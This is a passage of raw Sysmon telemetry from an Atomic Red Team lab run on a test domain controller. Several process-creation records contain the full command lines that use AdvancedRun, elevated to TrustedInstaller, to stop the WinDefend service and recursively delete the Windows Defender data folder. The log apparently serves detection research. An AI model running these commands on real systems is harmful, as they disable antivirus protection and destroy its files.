ent.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003943680Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.096{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-EB39-61EA-2503-000000002702}4780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 734700x80000000000000003943679Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943678Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943677Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003943676Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003943675Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.090{834264DD-EB39-61EA-2503-000000002702}47804812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a
459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003943674Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.091{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" /EXEFilename C:\Windows\System32\sc.exe /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory /RunAs 8 
/RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-EB39-61EA-2503-000000002702}4780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 154100x80000000000000003943421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:53.858{834264DD-EB39-61EA-2503-000000002702}4780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003942881Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:17.109{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003942880Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:17.109{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003942879Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:17.109{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 534500x80000000000000003942863Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003942853Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.999{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003942852Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003942851Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942850Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942849Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942847Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942846Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942845Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942844Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942843Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
